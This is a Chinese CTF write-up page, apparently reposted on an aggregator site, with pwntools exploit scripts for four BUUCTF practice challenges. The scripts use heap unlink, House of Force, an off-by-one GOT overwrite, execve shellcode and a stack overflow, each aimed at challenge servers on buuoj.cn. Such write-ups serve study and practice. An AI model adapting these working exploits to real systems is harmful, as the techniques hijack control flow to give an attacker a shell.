當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

PWN-PRACTICE-BUUCTF-19

發布時間：2023/12/10 编程问答 30 豆豆

生活随笔收集整理的這篇文章主要介紹了 PWN-PRACTICE-BUUCTF-19 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

PWN-PRACTICE-BUUCTF-19

- hitcontraining_bamboobox
- picoctf_2018_shellcode
- npuctf_2020_easyheap
- cmcc_pwnme2

hitcontraining_bamboobox

unlink，參考：hitcontraining_bamboobox 堆技巧 unlink

# -*- coding:utf-8 -*- from pwn import * #io=process("./bamboobox") io=remote("node4.buuoj.cn",29339) elf=ELF("./bamboobox") libc=ELF("./libc-2.23-16-x64.so")def show():io.sendlineafter("Your choice:","1") def add(name_len,name):io.sendlineafter("Your choice:","2")io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the name of item:",name) def edit(index,name_len,name):io.sendlineafter("Your choice:","3")io.sendlineafter("the index of item:",str(index))io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the new name of the item:",name) def free(index):io.sendlineafter("Your choice:","4")io.sendlineafter("the index of item:",str(index)) def exit():io.sendlineafter("Your choice:","5")#gdb.attach(io) #pause()add(0x40,"aaaa") add(0x80,"bbbb") add(0x80,"cccc")#pause()ptr=0x00000000006020C8 fd=ptr-0x18 bk=ptr-0x10 payload=p64(0)+p64(0x40)+p64(fd)+p64(bk) payload=payload.ljust(0x40,"A") payload+=p64(0x40)+p64(0x90) edit(0,len(payload),payload)#pause()free(1)#pause()atoi_got=elf.got["atoi"] payload=p64(0)*2+p64(0x40)+p64(atoi_got) edit(0,len(payload),payload)#pause()show() io.recvuntil("0 : ") atoi_addr=u64(io.recv(6).ljust(8,"\x00")) print("atoi_addr=="+hex(atoi_addr)) libc_base=atoi_addr-libc.sym["atoi"] system=libc_base+libc.sym["system"]#pause()edit(0,0x08,p64(system))#pause()io.sendlineafter("Your choice:","/bin/sh\x00")io.interactive()

House of Force，參考：hitcontraining_bamboobox 堆技巧 House of Force

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" io=process("./bamboobox") #io=remote("node4.buuoj.cn",26168) elf=ELF("./bamboobox") libc=ELF("./libc-2.23-16-x64.so")def show():io.sendlineafter("Your choice:","1") def add(name_len,name):io.sendlineafter("Your choice:","2")io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the name of item:",name) def edit(index,name_len,name):io.sendlineafter("Your choice:","3")io.sendlineafter("the index of item:",str(index))io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the new name of the item:",name) def free(index):io.sendlineafter("Your choice:","4")io.sendlineafter("the index of item:",str(index)) def exit():io.sendlineafter("Your choice:","5")#gdb.attach(io) #pause()add(0x30,"aaaa") payload="a"*0x30+p64(0)+p64(0xffffffffffffffff) edit(0,len(payload),payload)#pause()offset=0x000-0x060-0x10 add(offset,"bbbb")#移動top chunk#pause()magic=0x0000000000400D49 add(0x10,p64(magic)*2)#pause()exit()#pause()io.interactive()

picoctf_2018_shellcode

32位elf，靜態編譯，保護幾乎全都沒開
main函數中有條call eax的gadget，eax保存的是輸入的起始地址，于是輸入shellcode即可執行

from pwn import * #io=process('./PicoCTF_2018_shellcode') io=remote('node4.buuoj.cn',27908) elf=ELF('PicoCTF_2018_shellcode') io.recvuntil('Enter a string!\n') shellcode=asm('xor ecx,ecx;xor edx,edx;push edx;push 0x68732f6e;push 0x69622f2f ;mov ebx,esp;mov eax,0xb;int 0x80') io.sendline(shellcode) io.interactive()

npuctf_2020_easyheap

obo，參考：npuctf_2020_easyheap

# -*- coding:utf-8 -*- from pwn import * #io=process("./npuctf_2020_easyheap") io=remote("node4.buuoj.cn",25100) elf=ELF("./npuctf_2020_easyheap") libc=ELF("./libc-2.27-18-x64.so")def add(size,content):io.sendlineafter("Your choice :","1")io.sendlineafter("Size of Heap(0x10 or 0x20 only) : ",str(size))io.sendlineafter("Content:",content) def edit(index,content):io.sendlineafter("Your choice :","2")io.sendlineafter("Index :",str(index))io.sendlineafter("Content: ",content) def show(index):io.sendlineafter("Your choice :","3")io.sendlineafter("Index :",str(index)) def free(index):io.sendlineafter("Your choice :","4")io.sendlineafter("Index :",str(index)) def exit():io.sendlineafter("Your choice :","5")#gdb.attach(io) #pause()add(0x18,"aaaa")#0 add(0x18,"bbbb")#1 add(0x18,"/bin/sh\x00")#2#pause()payload="a"*0x18+p64(0x41) edit(0,payload)#pause()free(1)#pause()payload="a"*0x10+p64(0)+p64(0x21)+p64(8)+p64(elf.got["free"]) add(0x38,payload)#pause()show(1) io.recvuntil("Content : ") free_addr=u64(io.recvuntil("\n")[:-1].ljust(8,"\x00")) print("free_addr=="+hex(free_addr)) libc_base=free_addr-libc.sym["free"] system=libc_base+libc.sym["system"] print("system=="+hex(system))#pause()edit(1,p64(system)) free(2)#pause()io.interactive()

cmcc_pwnme2

棧溢出

from pwn import * #io=process('./cmcc_pwnme2') io=remote('node4.buuoj.cn',29405) elf=ELF('./cmcc_pwnme2') gets_plt=elf.plt['gets'] string_addr=0x0804A060 exec_str=0x080485CB io.recvuntil('Please input:\n') payload='a'*(0x6c+4)+p32(gets_plt)+p32(exec_str)+p32(string_addr) io.sendline(payload) io.sendline('./flag') io.interactive()

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-19的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： P系列RYYB大底主摄下放华为nova
下一篇：全球增长最快芯片公司20强排行：19家来